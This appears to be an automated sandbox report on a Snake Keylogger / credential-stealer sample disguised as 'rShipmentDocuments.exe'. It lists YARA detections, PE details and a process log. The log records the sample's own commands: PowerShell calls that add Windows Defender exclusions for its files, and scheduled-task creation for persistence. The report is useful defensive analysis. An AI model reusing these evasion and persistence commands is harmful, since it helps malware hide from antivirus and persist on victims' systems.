                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.rShipmentDocuments.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.4134245226.0000000000423000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.1768004359.000000000390E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1729453835.00000000043CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7300, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: rShipmentDocuments.exe PID: 7768, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ZOlmYtPdlO.exe PID: 7824, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: rShipmentDocuments.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ZOlmYtPdlO.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.43cd0d8.2.raw.unpack, B--.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.44114f8.0.raw.unpack, B--.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.390e1a0.1.raw.unpack, B--.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 10.2.ZOlmYtPdlO.exe.39525c0.0.raw.unpack, -B-.cs | Cryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, WHIuwreRDsPbwviSjC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, WHIuwreRDsPbwviSjC.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.7db0000.4.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: _0020.AddAccessRule
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: _0020.SetAccessControl
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.rShipmentDocuments.exe.4507ae0.1.raw.unpack, cQp1qcD75pepdx07b2.cs | Security API names: _0020.AddAccessRule
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@25/15@3/4
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | File created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Mutant created: NULL
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7560:120:WilError_03
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8084:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Mutant created: \Sessions\1\BaseNamedObjects\RDJCqbWVNpnzGVnTyiGSZiAgR
                Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7496:120:WilError_03
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | File created: C:\Users\user\AppData\Local\Temp\tmp44A0.tmp
                Source: rShipmentDocuments.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: rShipmentDocuments.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | File read: C:\Users\user\Desktop\desktop.ini
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: rShipmentDocuments.exe | Virustotal: Detection: 37%
                Source: rShipmentDocuments.exe | ReversingLabs: Detection: 28%
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | File read: C:\Users\user\Desktop\rShipmentDocuments.exe
                Source: unknown | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: unknown | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp44A0.tmp"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Process created: C:\Users\user\Desktop\rShipmentDocuments.exe "C:\Users\user\Desktop\rShipmentDocuments.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZOlmYtPdlO" /XML "C:\Users\user\AppData\Local\Temp\tmp5356.tmp"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe | Process created: C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe "C:\Users\user\AppData\Roaming\ZOlmYtPdlO.exe"
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: mscoree.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: windows.storage.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: wldp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: dwrite.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: textshaping.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: windowscodecs.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: iconcodecservice.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: propsys.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: edputil.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: urlmon.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: iertutil.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: srvcli.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: netutils.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: windows.staterepositoryps.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: sspicli.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: wintypes.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: appresolver.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: bcp47langs.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: slc.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: sppc.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: onecorecommonproxystub.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: onecoreuapcommonproxystub.dll
                Source: C:\Users\user\Desktop\rShipmentDocuments.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
